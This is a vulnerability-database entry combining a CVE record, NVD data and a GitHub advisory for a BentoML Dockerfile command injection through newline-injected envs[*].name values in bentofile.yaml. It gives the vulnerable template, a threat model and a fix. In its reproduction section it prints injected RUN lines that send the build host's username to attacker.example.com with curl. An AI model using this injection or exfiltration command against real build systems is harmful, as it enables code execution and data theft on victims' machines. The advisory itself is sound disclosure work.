CVE-2026-44346 (GCVE-0-2026-44346)

Vulnerability from cvelistv5 – Published: 2026-05-27 17:22 – Updated: 2026-05-27 17:22

Title

BentoML: Dockerfile command injection via envs[*].name in bentofile.yaml

Summary

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39.

Severity

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/bentoml/BentoML/security/advis…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
bentoml	BentoML	Affected: < 1.4.39

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "BentoML",
          "vendor": "bentoml",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.39"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-27T17:22:47.101Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44"
        }
      ],
      "source": {
        "advisory": "GHSA-w2pm-x38x-jp44",
        "discovery": "UNKNOWN"
      },
      "title": "BentoML: Dockerfile command injection via envs[*].name in bentofile.yaml"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44346",
    "datePublished": "2026-05-27T17:22:47.101Z",
    "dateReserved": "2026-05-05T19:52:59.148Z",
    "dateUpdated": "2026-05-27T17:22:47.101Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44346\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T18:16:23.333\",\"lastModified\":\"2026-05-27T18:16:23.333\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"},{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-44346

Vulnerability from fkie_nvd - Published: 2026-05-27 18:16 - Updated: 2026-05-27 18:16

Severity

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39."
    }
  ],
  "id": "CVE-2026-44346",
  "lastModified": "2026-05-27T18:16:23.333",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-27T18:16:23.333",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        },
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-W2PM-X38X-JP44

Vulnerability from github – Published: 2026-05-11 14:27 – Updated: 2026-05-11 14:27

Summary

Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)

Details

BentoML `envs[*].name` Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043

A malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. Verified end-to-end on bentoml==1.4.38.

Vulnerable code

src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73:

{% for env in __bento_envs__ %}
{% set stage = env.stage | default("all") -%}
{% if stage != "runtime" -%}
ARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name }}=${{ env.name }}
{% endif -%}
{% endfor %}

env.value is bash-quoted via the bash_quote filter, but env.name is interpolated raw with no escaping or newline filtering. The template is rendered by _bentoml_impl/docker.generate_dockerfile (the v2 SDK Docker generation path used by bentoml containerize for modern services).

Sibling relationship to existing CVEs

The earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field:

CVE-2026-33744 / GHSA-jfjg-vc52-wqvf (2026-03-25): added bash_quote to system_packages interpolation in Dockerfile templates and images.py.
CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw (2026-04-02): added shlex.quote to system_packages in the cloud deployment path (_internal/cloud/deployment.py:1648).

Both patches limit themselves to system_packages. The envs[*].name field is the same root-cause class (bentofile.yaml value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope.

Reproduction

pip install bentoml==1.4.38
python verify_render.py

Expected:

[*] rendered Dockerfile size: 1789 bytes
[*] injected RUN lines: 3
    RUN curl -fsSL http://attacker.example.com/$(whoami)=1
    RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO
    RUN curl -fsSL http://attacker.example.com/$(whoami)

Each injected RUN line is a Dockerfile command that runs during docker build. With $(whoami) shell-substituted by Docker's RUN executor, the example payload exfiltrates the build host's username.

Threat model

Attacker authors a malicious bento with a crafted bentofile.yaml.
Attacker exports the bento (.bento or .tar.gz) and distributes (S3, HTTP, BentoCloud share, etc.).
Victim imports with bentoml import bento.tar; no validation of envs content.
Victim runs bentoml containerize to build the container image.
BentoML renders the Dockerfile with the attacker's envs values, producing injected RUN lines.
docker build (or BuildKit) executes the injected RUN commands on the build host, achieving RCE in the victim's build environment.

The flow mirrors CVE-2026-33744 exactly, with envs substituted for system_packages.

Suggested fix

In base_v2.j2 lines 71-73, apply the bash_quote filter to env.name (and to the =$VAR reference in the ENV line, since the variable name itself is reused there):

ARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }}

Better, since env.name is semantically a Dockerfile identifier, validate at the schema level: in bentoml/_internal/bento/build_config.py:BentoEnvSchema, add an attr.validators.matches_re(r"^[A-Za-z_][A-Za-z0-9_]*$") to the name field so newline / shell-metacharacter values are rejected at config load.

Affected versions

bentoml 1.4.38 (verified end-to-end)
Likely all 1.x versions where _bentoml_impl/docker.py exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings.

Disclosure

Requesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request.

PoC artifacts

Gated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc

Severity

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.4.38"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.39"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44346"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:27:37Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# BentoML `envs[*].name` Dockerfile command injection \u2014 sibling of CVE-2026-33744 / CVE-2026-35043\n\nA malicious `bentofile.yaml` containing a newline-injected value in `envs[*].name` produces unquoted `RUN` directives in the BentoML-generated Dockerfile. When the victim runs `bentoml containerize` on the imported bento, those `RUN` directives execute on the host during `docker build`. Verified end-to-end on `bentoml==1.4.38`.\n\n## Vulnerable code\n\n`src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73`:\n\n```jinja\n{% for env in __bento_envs__ %}\n{% set stage = env.stage | default(\"all\") -%}\n{% if stage != \"runtime\" -%}\nARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}\nENV {{ env.name }}=${{ env.name }}\n{% endif -%}\n{% endfor %}\n```\n\n`env.value` is bash-quoted via the `bash_quote` filter, but **`env.name` is interpolated raw** with no escaping or newline filtering. The template is rendered by `_bentoml_impl/docker.generate_dockerfile` (the v2 SDK Docker generation path used by `bentoml containerize` for modern services).\n\n## Sibling relationship to existing CVEs\n\nThe earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field:\n\n- **CVE-2026-33744 / GHSA-jfjg-vc52-wqvf** (2026-03-25): added `bash_quote` to `system_packages` interpolation in Dockerfile templates and `images.py`.\n- **CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw** (2026-04-02): added `shlex.quote` to `system_packages` in the cloud deployment path (`_internal/cloud/deployment.py:1648`).\n\nBoth patches limit themselves to `system_packages`. The `envs[*].name` field is the same root-cause class (`bentofile.yaml` value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope.\n\n## Reproduction\n\n```bash\npip install bentoml==1.4.38\npython verify_render.py\n```\n\nExpected:\n\n```\n[*] rendered Dockerfile size: 1789 bytes\n[*] injected RUN lines: 3\n    RUN curl -fsSL http://attacker.example.com/$(whoami)=1\n    RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO\n    RUN curl -fsSL http://attacker.example.com/$(whoami)\n```\n\nEach injected `RUN` line is a Dockerfile command that runs during `docker build`. With `$(whoami)` shell-substituted by Docker\u0027s RUN executor, the example payload exfiltrates the build host\u0027s username.\n\n## Threat model\n\n1. Attacker authors a malicious bento with a crafted `bentofile.yaml`.\n2. Attacker exports the bento (`.bento` or `.tar.gz`) and distributes (S3, HTTP, BentoCloud share, etc.).\n3. Victim imports with `bentoml import bento.tar`; no validation of `envs` content.\n4. Victim runs `bentoml containerize` to build the container image.\n5. BentoML renders the Dockerfile with the attacker\u0027s `envs` values, producing injected `RUN` lines.\n6. `docker build` (or BuildKit) executes the injected `RUN` commands on the build host, achieving RCE in the victim\u0027s build environment.\n\nThe flow mirrors CVE-2026-33744 exactly, with `envs` substituted for `system_packages`.\n\n## Suggested fix\n\nIn `base_v2.j2` lines 71-73, apply the `bash_quote` filter to `env.name` (and to the `=$VAR` reference in the `ENV` line, since the variable name itself is reused there):\n\n```jinja\nARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}\nENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }}\n```\n\nBetter, since `env.name` is semantically a Dockerfile identifier, validate at the schema level: in `bentoml/_internal/bento/build_config.py:BentoEnvSchema`, add an `attr.validators.matches_re(r\"^[A-Za-z_][A-Za-z0-9_]*$\")` to the `name` field so newline / shell-metacharacter values are rejected at config load.\n\n## Affected versions\n\n- bentoml 1.4.38 (verified end-to-end)\n- Likely all 1.x versions where `_bentoml_impl/docker.py` exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings.\n\n## Disclosure\n\nRequesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request.\n\n\n## PoC artifacts\n\nGated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc",
  "id": "GHSA-w2pm-x38x-jp44",
  "modified": "2026-05-11T14:27:37Z",
  "published": "2026-05-11T14:27:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-78f9-r8mh-4xm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-w2pm-x38x-jp44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44346 (GCVE-0-2026-44346)

FKIE_CVE-2026-44346

GHSA-W2PM-X38X-JP44

BentoML envs[*].name Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043

Vulnerable code

Sibling relationship to existing CVEs

Reproduction

Threat model

Suggested fix

Affected versions

Disclosure

PoC artifacts

Tags

Sightings

Nomenclature

BentoML `envs[*].name` Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043